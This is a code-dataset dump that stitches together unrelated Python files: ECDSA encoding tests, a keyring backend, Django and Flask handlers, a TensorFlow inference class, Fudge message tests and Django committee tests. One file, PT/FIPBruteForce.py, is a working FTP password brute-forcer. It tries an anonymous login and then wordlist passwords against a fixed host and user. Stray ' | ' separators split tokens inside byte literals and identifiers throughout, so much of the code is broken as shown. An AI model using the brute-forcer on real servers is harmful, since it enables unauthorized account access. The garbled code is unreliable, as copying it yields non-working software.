self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
# x coordinate
b'\x3a\x53\x5b\xd0\xbe\x46\x6f\xf3\xd8\x56'
b'\xa0\x77\xaa\xd9\x50\x4f\x16\xaa\x5d\x52'
b'\x28\xfc\xd7\xc2\x77\x48\x85\xee\x21\x3f'
b'\x3b\x34'
# y coordinate
b'\x66\xab\xa8\x18\x5b\x33\x41\xe0\xc2\xe3'
b'\xd1\xb3\xae\x69\xe4\x7d\x0f\x01\xd4\xbb'
b'\xd7\x06\xd9\x57\x8b\x0b\x65\xd6\xd3\xde'
b'\x1e\xfe'
))
def test_encode_P_256_point_with_zero_first_byte_on_x(self):
point = ecdsa.NIST256p.generator * 379
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x00\x55\x43\x89\x4a\xf3\xd0\x0e\xd7\xd7'
b'\x40\xab\xdb\xd7\x5c\x96\xb0\x68\x77\xb7'
b'\x87\xdb\x5f\x70\xee\xa7\x8b\x90\xa8\xd7'
b'\xc0\x0a'
b'\xbb\x4c\x85\xa3\xd8\xea\x29\xef\xaa\xfa'
b'\x24\x40\x69\x12\xdd\x84\xd5\xb1\x4d\xc3'
b'\x2b\xf6\x56\xef\x6c\x6b\xd5\x8a\x5d\x94'
b'\x3f\x92'
))
def test_encode_P_256_point_with_zero_first_byte_on_y(self):
point = ecdsa.NIST256p.generator * 43
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x98\x6a\xe2\x50\x6f\x1f\xf1\x04\xd0\x42'
b'\x30\x86\x1d\x8f\x4b\x49\x8f\x4b\xc4\xc6'
b'\xd0\x09\xb3\x0f\x75\x44\xdc\x12\x9b\x82'
b'\xd2\x8d'
b'\x00\x3c\xcc\xc0\xa6\x46\x0e\x0a\xe3\x28'
b'\xa4\xd9\x7d\x3c\x7b\x61\xd8\x6f\xc6\x28'
b'\x9c\x18\x9f\x25\x25\x11\x0c\x44\x1b\xb0'
b'\x7e\x97'
))
def test_encode_P_256_point_with_two_zero_first_bytes_on_x(self):
point = ecdsa.NIST256p.generator * 40393
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x00\x00\x3f\x5f\x17\x8a\xa0\x70\x6c\x42'
b'\x31\xeb\x6e\x54\x95\xaa\x16\x42\xc5\xb8'
b'\xa9\x94\x12\x7c\x89\x46\x5f\x22\x99\x4a'
b'\x42\xf9'
b'\xc2\x48\xb3\x37\x59\x9f\x0c\x2f\x29\x77'
b'\x2e\x25\x6f\x1d\x55\x49\xc8\x9b\xa9\xe5'
b'\x73\x13\x82\xcd\x1e\x3c\xc0\x9d\x10\xd0'
b'\x0b\x55'))
def test_encode_P_521_point(self):
point = ecdsa.NIST521p.generator * 200
self.assertEqual(encodeX962Point(point),
bytearray(b'\x04'
b'\x00\x3e\x2a\x2f\x9f\xd5\x9f\xc3\x8d\xfb'
b'\xde\x77\x26\xa0\xbf\xc6\x48\x2a\x6b\x2a'
b'\x86\xf6\x29\xb8\x34\xa0\x6c\x3d\x66\xcd'
b'\x79\x8d\x9f\x86\x2e\x89\x31\xf7\x10\xc7'
b'\xce\x89\x15\x9f\x35\x8b\x4a\x5c\x5b\xb3'
b'\xd2\xcc\x9e\x1b\x6e\x94\x36\x23\x6d\x7d'
b'\x6a\x5e\x00\xbc\x2b\xbe'
b'\x01\x56\x7a\x41\xcb\x48\x8d\xca\xd8\xe6'
b'\x3a\x3f\x95\xb0\x8a\xf6\x99\x2a\x69\x6a'
b'\x37\xdf\xc6\xa1\x93\xff\xbc\x3f\x91\xa2'
b'\x96\xf3\x3c\x66\x1 | 5\x57\x3c\x1c\x06\x7f'
b'\x0a\x06\x4d\x18\xbd\x0c\x81\x4e\xf7\x2a'
b'\x8f\x76\xf8\x7f\x9b\x7d\xff\xb2\xf4\x26'
b'\x36\x43\x43\x86\x | 11\x89'))
class TestDecoder(unittest.TestCase):
def test_decode_P_256_point(self):
point = ecdsa.NIST256p.generator * 379
data = bytearray(b'\x04'
b'\x00\x55\x43\x89\x4a\xf3\xd0\x0e\xd7\xd7'
b'\x40\xab\xdb\xd7\x5c\x96\xb0\x68\x77\xb7'
b'\x87\xdb\x5f\x70\xee\xa7\x8b\x90\xa8\xd7'
b'\xc0\x0a'
b'\xbb\x4c\x85\xa3\xd8\xea\x29\xef\xaa\xfa'
b'\x24\x40\x69\x12\xdd\x84\xd5\xb1\x4d\xc3'
b'\x2b\xf6\x56\xef\x6c\x6b\xd5\x8a\x5d\x94'
b'\x3f\x92'
)
decoded_point = decodeX962Point(data, ecdsa.NIST256p)
self.assertEqual(point, decoded_point)
def test_decode_P_521_point(self):
data = bytearray(b'\x04'
b'\x01\x7d\x8a\x5d\x11\x03\x4a\xaf\x01\x26'
b'\x5f\x2d\xd6\x2d\x76\xeb\xd8\xbe\x4e\xfb'
b'\x3b\x4b\xd2\x05\x5a\xed\x4c\x6d\x20\xc7'
b'\xf3\xd7\x08\xab\x21\x9e\x34\xfd\x14\x56'
b'\x3d\x47\xd0\x02\x65\x15\xc2\xdd\x2d\x60'
b'\x66\xf9\x15\x64\x55\x7a\xae\x56\xa6\x7a'
b'\x28\x51\x65\x26\x5c\xcc'
b'\x01\xd4\x19\x56\xfa\x14\x6a\xdb\x83\x1c'
b'\xb6\x1a\xc4\x4b\x40\xb1\xcb\xcc\x9e\x4f'
b'\x57\x2c\xb2\x72\x70\xb9\xef\x38\x15\xae'
b'\x87\x1f\x85\x40\x94\xda\x69\xed\x97\xeb'
b'\xdc\x72\x25\x25\x61\x76\xb2\xde\xed\xa2'
b'\xb0\x5c\xca\xc4\x83\x8f\xfb\x54\xae\xe0'
b'\x07\x45\x0b\xbf\x7c\xfc')
point = decodeX962Point(data, ecdsa.NIST521p)
self.assertIsNotNone(point)
self.assertEqual(encodeX962Point(point), data)
def test_decode_with_missing_data(self):
data = bytearray(b'\x04'
b'\x00\x55\x43\x89\x4a\xf3\xd0\x0e\xd7\xd7'
b'\x40\xab\xdb\xd7\x5c\x96\xb0\x68\x77\xb7'
b'\x87\xdb\x5f\x70\xee\xa7\x8b\x90\xa8\xd7'
b'\xc0\x0a'
b'\xbb\x4c\x85\xa3\xd8\xea\x29\xef\xaa\xfa'
b'\x24\x40\x69\x12\xdd\x84\xd5\xb1\x4d\xc3'
b'\x2b\xf6\x56\xef\x6c\x6b\xd5\x8a\x5d\x94'
#b'\x3f\x92'
)
# XXX will change later as decoder in tlslite-ng needs to be updated
with self.assertRaises(SyntaxError):
decodeX962Point(data, ecdsa.NIST256p)
class TestCurveLookup(unittest.TestCase):
def test_with_correct_name(self):
curve = getCurveByName('secp256r1')
self.assertIs(curve, ecdsa.NIST256p)
def test_with_invalid_name(self):
with self.assertRaises(ValueError):
getCurveByName('NIST256p')
class TestGetPointByteSize(unittest.TestCase):
def test_with_curve(self):
self.assertEqual(getPointByteSize(ecdsa.NIST256p), 32)
def test_with_point(self):
|
ruuk/script.module.password.storage | lib/keyring/backends/SecretService.py | Python | gpl-2.0 | 2,786 | 0.001077 | import logging
from ..util import properties
from ..util import XDG
from ..backend import KeyringBackend
from ..errors import (InitError, PasswordDeleteError,
ExceptionRaisedContext)
try:
import secretstorage
import secretstorage.exceptions as exceptions
except ImportError:
pass
log = logging.getLogger(__name__)
class Keyring(KeyringBackend):
"""Secret Service Keyring"""
@properties.ClassProperty
@classmethod
@XDG.Preference('Gnome')
def priority(cls):
with ExceptionRaisedContext() as exc:
secretstorage.__name__
if exc:
raise RuntimeError("SecretStorage required")
if not hasattr(secretstorage, 'get_default_collection'):
raise RuntimeError("SecretStorage 1.0 or newer required")
try:
bus = secretstorage.dbus_init()
list(secretstorage.get_all_collections(bus))
except exceptions.SecretServiceNotAvailableException as e:
raise RuntimeError(
"Unable to initialize SecretService: %s" % e)
return 5
def get_default_collection(self):
bus = secretstorage.dbus_init()
try:
collection = secretstorage.get_default_collection(bus)
except exceptions.SecretStorageException as e:
raise InitError("Failed to create the collection: %s." % e) |
if collection.is_locked():
collection.unlock()
if collection.is_locked(): # User dismissed the prompt
raise InitError("Failed to unlock the collection!")
return collection
def get_password(self, service, username):
"""Get password of the username for the service
"""
collection = self.get_default_co | llection()
items = collection.search_items(
{"username": username, "service": service})
for item in items:
return item.get_secret().decode('utf-8')
def set_password(self, service, username, password):
"""Set password for the username of the service
"""
collection = self.get_default_collection()
attributes = {
"application": "python-keyring",
"service": service,
"username": username
}
label = "Password for '%s' on '%s'" % (username, service)
collection.create_item(label, attributes, password, replace=True)
def delete_password(self, service, username):
"""Delete the stored password (only the first one)
"""
collection = self.get_default_collection()
items = collection.search_items(
{"username": username, "service": service})
for item in items:
return item.delete()
raise PasswordDeleteError("No such password!")
|
dnguyen0304/clare | clare/clare/application/download_bot/handlers.py | Python | mit | 1,172 | 0 | # -*- coding: utf-8 -*-
from . import exceptions
from clare import common
from clare.common import messaging
from clare.common import retry
class NopHandler(messaging.consumer.interfaces.IHandler):
def handle(self, record):
pass
def __repr__(self):
repr_ = '{}()'
return repr_.format(self.__class__.__name__)
class OrchestratingHandler(messaging.consumer.interfaces.IHandler):
def __init__(self, handler, logger):
"""
Parameters
----------
handler : clare.application.download_bot.handlers.Download
logger : logging.Logger
"""
self._h | andler = handler
self._logger = logger
def handle(self, record):
try:
self._handler.handle(record=record)
except (exceptions.RoomExpired, retry.exceptions.MaximumRetry) as e:
message = common.logging.utilities.format_exception(e=e)
self._logger.debug(msg=message)
def __repr__(self):
repr_ = '{}(handler={}, logger={})'
return repr_.format(self.__class__.__name__,
self._handler,
| self._logger)
|
nick-jonas/static-jspm-boiler | main.py | Python | unlicense | 662 | 0.012085 | import os
import sys
# Import the Flask Framework
from flask import Flask, request, render_template
isDev = os.environ["SERVER_SOFTWARE"].find('Development') == 0
| app = Flask( __name__ )
# Note: We don't need to call run() since our application is embedded within
# the App Engine WSGI application server.
@app.route('/')
def home():
return render_template( 'index.html', isDev=isDev )
@app.errorhandler(404)
def page_not_found(e):
"""Return a custom 404 error."""
return 'Sorry, Nothing at this URL.', 404
|
@app.errorhandler(500)
def page_not_found(e):
"""Return a custom 500 error."""
return 'Sorry, unexpected error: {}'.format(e), 500
|
ceholden/yatsm | yatsm/version.py | Python | mit | 22 | 0 | __versio | n__ = | '0.7.0'
|
altosaar/proximity_vi | inferences/proximity_variational_inference.py | Python | mit | 5,782 | 0.006918 | import tensorflow as tf
import numpy as np
import collections
import time
import util
from .variational_inference import VariationalInference
from inferences import proximity_statistics
fw = tf.contrib.framework
layers = tf.contrib.layers
dist = tf.contrib.distributions
class ProximityVariationalInference(VariationalInference):
def __init__(self, session, config, model, variational, data):
super(ProximityVariationalInference, self).__init__(
session, config, model, variational, data)
cfg = self.config
self.build_proximity_statistic()
self.build_distance()
if not cfg['optim/deterministic_annealing']:
self.build_magnitude()
def build_proximity_statistic(self):
cfg = self.config
if cfg['c/proximity_statistic'] == 'entropy':
s = proximity_statistics.Entropy(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'kl':
s = proximity_statistics.KL(cfg, self.variational, model=self.model)
elif cfg['c/proximity_statistic'] == 'mean_variance':
s = proximity_statistics.MeanVariance(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'active_units':
s = proximity_statistics.ActiveUnits(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'activations_layer_0_fc0':
s = proximity_statistics.Activations(cfg, self.variational)
elif cfg['c/proximity_statistic'] == 'log_likelihood':
s = proximity_statistics.LogLikelihood(
cfg, self.variational, model=self.model, q_z_sample=self.q_z_sample,
data=self.data)
elif cfg['c/proximity_statistic'] == 'orthogonal':
s = proximity_statistics.Orthogonal(cfg, self.variational)
else:
raise ValueError('Proximity statistic %s not implemented!' %
cfg['c/proximity_statistic'])
self.proximity_statistic = s
def build_distance(self):
"""Distance between statistic f(lambda) and its moving average."""
cfg = self.config
distance = {}
proximity = self.proximity_statistic
moving_average = proximity.moving_average
for name, stat in proximity.statistic.items():
difference = stat - moving_average[name]
if cfg['c/distance'] == 'square_difference':
dist = tf.square(difference)
elif cfg['c/distance'] == 'inverse_huber':
dist = tf.where(tf.abs(difference) <= 1.0,
tf.abs(difference), 0.5 * tf.square(difference) + 0.5)
if 'latent' in proximity.named_shape[name]:
dist = tf.reduce_sum(dist, proximity.named_shape[name]['latent'])
proximity.named_shape[name].remove('latent')
if 'param_0' in proximity.named_shape[name]:
dist = tf.reduce_sum(dist, proximity.named_shape[name]['param_0'])
proximity.named_shape[name].remove('param_0')
if 'param_1' in proximity.named_shape[name]:
dist = tf.reduce_sum(dist, proximity.named_shape[name]['param_1'])
proximity.named_shape[name].remove('param_1')
distance[name] = dist
name = '_'.join(['c/distance', cfg['c/proximity_statistic'], name])
tf.summary.scalar(name, tf.reduce_mean(dist))
self.distance = distance
res = 0.
for dist in distance.values():
res += dist
self.distance_sum = res
def log_stats(self, feed_dict={}):
cfg = self.config
self.t = time.time()
sess = self.session
(np_step, np_elbo, np_entropy, summary_str, np_distance) = sess.run(
[self.global_step, self.elbo_sum, self.q_entropy, self.summary_op,
self.distance_sum], feed_dict)
msg = ('Iteration: {0:d} ELBO: {1:.3e} Entropy: {2:.3e} '
'Examples/s: {3:.3e} ').format(
np_step, np_elbo / cfg['batch_size'], np_entropy,
cfg['batch_size'] * cfg['print_every'] / (self.t - self.t0))
constraint_msg = ('Distance sum: {:.3e}').format(np.mean(np_distance))
constraint_msg += ' k: {:.3e}'.format(sess.run(self.magnitude, feed_dict))
if cfg['c/proximity_statistic'] == 'active_units':
np_variances = self.session.run(
self.proximity_statistic.statistic_list, feed_dict)
def active(np_var): return np.where(np_var > 0.01)[0].shape[0]
msg += ' Active units: %d ' % np.mean([active(v) for v in np_variances])
self.t0 = self.t
self.summary_writer.add_summary(summary_str, global_step=np_step)
self.save_params(np_step)
# self.log_grad_stats(feed_dict)
return msg + constraint_msg
def build_q_gradients(self):
cfg = self.config
q_gradients = self.q_neg_elbo_grad
constraint_grad = [0.] | * len(self.q_params)
magnitude = self.magnitude
if cfg['c/decay'] == 'linear':
magnitude = tf.maximum(magnitude, 0.)
for name, distance in self.distance.items():
distance_grad = tf.gradients(distance, self.q_params)
for i in range(len(self.q_params)):
if distance_grad[i] is not None:
param_name = util.tensor_name(self.q_params[i])
update = magnitude * distance_grad[i]
constraint_grad[i] += update
q_gradients[i] += update
| update_norm = util.norm(update)
fraction = tf.reduce_mean(
update_norm / util.norm(self.q_neg_elbo_grad[i] + update))
fraction = tf.Print(fraction, [fraction], 'fraction: ')
tf.summary.scalar('_'.join(['c/fraction_grad_d', name, param_name]),
fraction)
tf.summary.scalar(
'_'.join(['c/norm_grad_constraint', name, param_name]),
update_norm)
tf.summary.scalar(
'_'.join(
['c/ratio_grad_constraint_grad_neg_elbo', name, param_name]),
update_norm / self.q_neg_elbo_grad_norm[i])
self.q_gradients = q_gradients
self.q_constraint_grad = constraint_grad
|
barbieauglend/Learning_python | PT/FIPBruteForce.py | Python | unlicense | 1,369 | 0.006574 | import ftplib
def connect(host, user, password):
try:
ftp = ftplib.FTP(host)
ftp.login(user, password)
ftp.quit()
| return True
except:
return False
def main():
# Variables
targetHostAddress = '10.0.0.24'
userName = 'bwayne'
passwordsFilePath = 'passwords.txt'
# Try to connect using anonymous credentials
print('[+] Using anonymous credentials for ' + targetHostAddress)
if connect(targetHostAddress, 'anonymous', 'test@test.com'):
print('[*] FTP Anonymous log on succeeded on host ' + targetHostAddress)
else:
print('[*] FTP Anonymous | log on failed on host ' + targetHostAddress)
# Try brute force using dictionary
# Open passwords file
passwordsFile = open(passwordsFilePath, 'r')
for line in passwordsFile.readlines():
password = line.strip('\r').strip('\n')
print('Testing: ' + str(password))
if(connect(targetHostAddress, userName, password)):
#Password found
print('[*] FTP log on succeeded on host ' + targetHostAddress + '\n' + 'username: ' + userName + '\n' + 'password: ' + password)
exit(0)
else:
print('[*] FTP log on failed on host ' + targetHostAddress + '\n' + 'username: ' + userName + '\n' + 'password: ' + password)
if __name__ == "__main__":
main() |
nathanross/amiens | qlib/fq.audio_strict_long_hq.py | Python | apache-2.0 | 2,403 | 0.013317 | #!/usr/bin/python3
# Copyright 2015 Nathan Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
#!/bin/python3
def audio_strict_long_hq(s, l):
# strict means if we don't have
# requisite information about the file,
# skip it.
# (e.g. for files that means m4as which we can't get length for.)
#print('length:'+repr(l))
#print('skipping')
#return False
#if length < 20 min. skip.
min_minutes = 20
if l == None:
print('fq`using default length')
l = (1+min_minutes) * 60
if s == None:
#every media files < 30kb each. skip.
return False
if (s / 1048576) > 1700:
#assume uninterested in downloading things past the size of two FLAC cds.
return False
print('fq`length:'+repr(l)+' size:'+repr(s))
if l < (min_minutes * 60):
#print('less than {}, skipping'.format(min_minutes*60))
| return False
bytes_per_second=(s/l)
kbps=bytes_per_second*(8/1024.)
print('fq`kbps:'+repr(kbps))
target_min_kbps=192
# note that even when set to a cbr, there's going
# to sometimes be size variance /below/ that cbr
# 0.96x-4 is an initial wild guess of a
# generous lower bound.
if kbps < ((target_min_kbps*0.96)-4):
print('fq`skipping as bitrate {} less tha | n target {}'.format(
repr(kbps), ((target_min_kbps*0.96)-4)
))
return False
return True
callback=audio_strict_long_hq
#chaneg these constants.
GOAL_TARGET_KBPS=192.
MIN_MINUTES=20
TARGET_KBPS=((GOAL_TARGET_KBPS*0.96)-4)
BYTE_PS_TO_KBPS=(8/1024.)
sql='AND totalAudioSize > ' + \
str((TARGET_KBPS/BYTE_PS_TO_KBPS)*(MIN_MINUTES*60)) + \
' AND ((totalAudioLength IS NULL) OR ((totalAudioLength > '+ \
str(MIN_MINUTES*60) + \
') AND ((totalAudioSize/totalAudioLength)*' + \
str(BYTE_PS_TO_KBPS) + ' >= ' + str(TARGET_KBPS) + ')))'
|
fna/owning-a-home-api | mortgageinsurance/migrations/0003_change_type_va_first_use.py | Python | cc0-1.0 | 2,743 | 0.006198 | # -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import DataMigration
from django.db import models
class Migration(DataMigration):
def forwards(self, orm):
for u in orm.Upfront.objects.all():
if u.va_first_use == 'Y':
u.new_va_first_use = True
elif u.va_first_use == 'N':
u.new_va_first_use = False
u.save()
def backwards(self, orm):
raise RuntimeError("Cannot reverse this migration.")
models = {
u'mortgageinsurance.monthly': {
'Meta': {'object_name': 'Monthly'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'insurer': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'loan_term': ('django.db.models.fields.IntegerField', [], {}),
'm | ax_fico': ('django.db.models.fields.IntegerField', [], {}),
'max_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_di | gits': '12', 'decimal_places': '2'}),
'max_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'min_fico': ('django.db.models.fields.IntegerField', [], {}),
'min_loan_amt': ('django.db.models.fields.DecimalField', [], {'max_digits': '12', 'decimal_places': '2'}),
'min_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'pmt_type': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'premium': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'})
},
u'mortgageinsurance.upfront': {
'Meta': {'object_name': 'Upfront'},
u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'loan_type': ('django.db.models.fields.CharField', [], {'max_length': '12'}),
'max_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'min_ltv': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'new_va_first_use': ('django.db.models.fields.NullBooleanField', [], {'null': 'True', 'blank': 'True'}),
'premium': ('django.db.models.fields.DecimalField', [], {'max_digits': '6', 'decimal_places': '3'}),
'va_first_use': ('django.db.models.fields.CharField', [], {'max_length': '3', 'blank': 'True'}),
'va_status': ('django.db.models.fields.CharField', [], {'max_length': '12', 'blank': 'True'})
}
}
complete_apps = ['mortgageinsurance']
symmetrical = True
|
gasevi/pyreclab | pypackage/__init__.py | Python | gpl-3.0 | 881 | 0.015891 | import platform
import sys
if platform.system() == 'Darwin':
native_version = (2, 7, 10, 'final' | , 0)
cur_version = sys.version_info
if cur_version == native_version:
from pyreclab.libpyreclab_native_py import MostPopular, UserAvg, ItemAvg, SlopeOne, UserKnn, ItemKnn, SVD, IFAls, IFAlsConjugateGradient, BprMf
else: # brew version
from pyreclab.libpyreclab import MostPopular, UserAvg, ItemAvg, SlopeOne, UserKnn, ItemKnn, SVD, IFAls, IFAlsConjugateGradient, BprMf
else:
from pyreclab.libpyreclab import MostPopular, UserAvg, ItemAvg, SlopeOne, UserKnn, ItemKn | n, SVD, IFAls, IFAlsConjugateGradient, BprMf
__all__ = [ 'MostPopular',
'UserAvg',
'ItemAvg',
'SlopeOne',
'UserKnn',
'ItemKnn',
'SVD',
'IFAls',
'IFAlsConjugateGradient',
'BprMf' ]
|
joequant/Fudge-Python | fudgemsg/tests/func_tests/test_deeper_msg.py | Python | apache-2.0 | 4,667 | 0.006642 | #!/usr/bin/env python
#
# Copyrigh CERN, 2010.
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. S | ee the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# U | nless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import unittest
import cStringIO
from fudgemsg.message import Message, Envelope
from fudgemsg import registry
from fudgemsg import types
from fudgemsg import utils
from nose.plugins.skip import SkipTest
class TestDeeperMsg(unittest.TestCase):
def test_deeper_submsg(self):
# comparison arrays
bytes = ''.join([chr(x%256) for x in range(512)] )
empty = [0] * 128
shorts = range(16)
doubles = [x/10.0 for x in range(16)]
m = Message()
m.add(types.INDICATOR, name=u"Indicator")
m.add(True, name=u"Boolean")
m.add(128, name=u"Byte") # Huh - in the C code it's -128 which isn't a byte!
m.add(-32768, name=u"Short")
m.add(2147483647, name=u"Int")
m.add(9223372036854775807L, name=u"Long")
m.add(1.23456, name=u"Float")
m.add(1.2345678, name=u"Double", type_=registry.DEFAULT_REGISTRY.type_by_id(types.DOUBLE_TYPE_ID))
byte_message= Message()
for size in (4, 8, 16, 20, 32, 64, 128, 256, 512):
byte_message.add(bytes[:size], ordinal=size)
m.add(byte_message, name=u'ByteArrays')
m.add(u'', name=u'Empty String')
m.add(u'This is a string.', name=u'String')
fp_message = Message()
fp_message.add(doubles[:0], name=u'Float[0]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.FLOATARRAY_TYPE_ID))
fp_message.add(empty[:15], name=u'Float[15]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.FLOATARRAY_TYPE_ID))
fp_message.add(doubles[:0], name=u'Double[0]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.DOUBLEARRAY_TYPE_ID))
fp_message.add(doubles[:15], name=u'Double[15]', \
type_=registry.DEFAULT_REGISTRY.type_by_id(types.DOUBLEARRAY_TYPE_ID))
array_message = Message()
array_message.add(bytes[:0], name=u'Byte[0]')
array_message.add(bytes[:15], name=u'Byte[15]')
array_message.add(fp_message, name=u'FP Arrays')
array_message.add(empty[:0], name=u'Short[0]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.SHORTARRAY_TYPE_ID))
array_message.add(shorts[:15], name=u'Short[15]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.SHORTARRAY_TYPE_ID))
array_message.add(empty[:0], name=u'Int[0]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.INTARRAY_TYPE_ID))
array_message.add(empty[:15], name=u'Int[15]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.INTARRAY_TYPE_ID))
array_message.add(empty[:0], name=u'Long[0]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.LONGARRAY_TYPE_ID))
array_message.add(empty[:15], name=u'Long[15]',
type_=registry.DEFAULT_REGISTRY.type_by_id(types.LONGARRAY_TYPE_ID))
m.add(array_message, name=u'Arrays')
empty_message = Message()
m.add(empty_message, name=u'Null Message')
e = Envelope(m)
writer = cStringIO.StringIO()
e.encode(writer)
bytes = writer.getvalue()
foo = open('fudgemsg/tests/data/deeper_fudge_msg.dat', 'r')
expected = foo.read()
foo.close()
self.assertEquals(len(expected), len(bytes))
self.assertEquals(expected, bytes)
def test_decode_encode_deeper(self):
"""decode then encode the deeper_fudge_msg.
Check they are the same.
"""
foo = open('fudgemsg/tests/data/deeper_fudge_msg.dat', 'r')
expected = foo.read()
foo.close()
e = Envelope.decode(expected)
writer = cStringIO.StringIO()
e.encode(writer)
bytes = writer.getvalue()
self.assertEquals(len(expected), len(bytes))
self.assertEquals(expected, bytes)
|
daonb/django-committee | src/committee/tests.py | Python | bsd-3-clause | 7,138 | 0.004483 | from datetime import datetime
from django.test import TestCase
from django.conf import settings
from django.core.urlresolvers import reverse
from django.contrib.auth.models import User,Group,Permission
from django.contrib.contenttypes.models import ContentType
from annotatetext.models import Annotation
from actstream.models import Action
from knesset.laws.models import Bill
from knesset.mks.models import Member
from models import *
just_id = lambda x: x.id
class ListViewTest(TestCase):
def setUp(self):
self.committee_1 = Committee.objects.create(name='c1')
self.committee_2 = Committee.objects.create(name='c2')
self.meeting_1 = self.committee_1.meetings.create(date=datetime.now(),
protocol_text='''jacob:
I am a perfectionist
adrian:
I have a deadline''')
self.meeting_1.create_protocol_parts()
self.meeting_2 = self.committee_1.meetings.create(date=datetime.now(),
protocol_text='m2')
self.meeting_2.create_protocol_parts()
self.jacob = User.objects.create_user('jacob', 'jacob@example.com',
'JKM')
(self.group, created) = Group.objects.get_or_create(name='Valid Email')
if created:
self.group.save()
self.group.permissions.add(Permission.objects.get(name='Can add annotation'))
self.jacob.groups.add(self.group)
self.bill_1 = Bill.objects.create(stage='1', title='bill 1')
self.mk_1 = Member.objects.create(name='mk 1')
def testProtocolPart(self):
parts_list = self.meeting_1.parts.list()
self.assertEqual(parts_list.count(), 2)
self.assertEqual(parts_list[0].header, u'jacob')
self.assertEqual(parts_list[0].body, 'I am a perfectionist')
self.assertEqual(parts_list[1].header, u'adrian')
self.assertEqual(parts_list[1].body, 'I have a deadline')
def testPartAnnotation(self):
'''this is more about testing the annotatext app '''
self.assertTrue(self.client.login(username='jacob', password='JKM'))
part = self.meeting_1.parts.list()[0]
res = self.client.post(reverse('annotatetext-post_annotation'),
{'selection_start': 7,
'selection_end': 14,
'flags': 0,
'color': '#000',
'lengthcheck': len(part.body),
'comment' : 'just perfect',
'object_id': part.id,
'content_type': ContentType.objects.get_for_model(part).id,
})
self.assertEqual(res.status_code, 302)
annotation = Annotation.objects.get(object_id=part.id,
content_type=ContentType.objects.get_for_model(part).id)
self.assertEqual(annotation.selection, 'perfect')
# ensure the activity has been recorded
stream = Action.objects.stream_for_actor(self.jacob)
self.assertEqual(stream.count(), 3)
self.assertEqual(stream[0].verb, 'started following')
self.assertEqual(stream[0].target.id, self.meeting_1.id)
self.assertEqual(stream[1].verb, 'got badge')
self.assertEqual(stream[2].verb, 'annotated')
self.assertEqual(stream[2].target.id, annotation.id)
# ensure we will see it on the committee page
annotations = self.committee_1.annotations
self.assertEqual(annotations.count(), 1)
self.assertEqual(annotations[0].comment, 'just perfect')
def testAnnotationForbidden(self):
self.jacob.groups.clear() # invalidate this user's email
self.assertTrue(self.client.login(username='jacob', password='JKM'))
part = self.meeting_1.parts.list()[0]
res = self.client.post(reverse('annotatetext-post_annotation'),
{'selection_start': 7,
'selection_end': 14,
'flags': 0,
'color': '#000',
'lengthcheck': len(part.body),
'comment' : 'just perfect',
'object_id': part.id,
'content_type': ContentType.objects.get_for_model(part).id,
})
self.assertEqual(res.status_code, 403) # 403 Forbidden. 302 means a user with unverified email has posted an annotation.
def tes | tCommitteeList(self):
res = self.client.get(reverse('committee-list'))
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res, 'committees/commit | tee_list.html')
object_list = res.context['object_list']
self.assertEqual(map(just_id, object_list),
[ self.committee_1.id, self.committee_2.id, ])
def testCommitteeMeetings(self):
res = self.client.get(self.committee_1.get_absolute_url())
self.assertEqual(res.status_code, 200)
self.assertTemplateUsed(res,
'committees/committee_detail.html')
object_list = res.context['meetings_list']
self.assertEqual(map(just_id, object_list),
[self.meeting_1.id, self.meeting_2.id, ],
'object_list has wrong objects: %s' % object_list)
def testLoginRequired(self):
res = self.client.post(reverse('committee-meeting',
kwargs={'pk': self.meeting_1.id}))
self.assertFalse(self.bill_1 in self.meeting_1.bills_first.all())
self.assertEqual(res.status_code, 302)
self.assertTrue(res['location'].startswith('%s%s' %
('http://testserver', settings.LOGIN_URL)))
def testConnectToMK(self):
self.assertTrue(self.client.login(username='jacob', password='JKM'))
res = self.client.post(reverse('committee-meeting',
kwargs={'pk': self.meeting_1.id}),
{'user_input_type': 'mk',
'mk_name': self.mk_1.name})
self.assertEqual(res.status_code, 302)
self.assertTrue(self.meeting_1 in self.mk_1.committee_meetings.all())
self.client.logout()
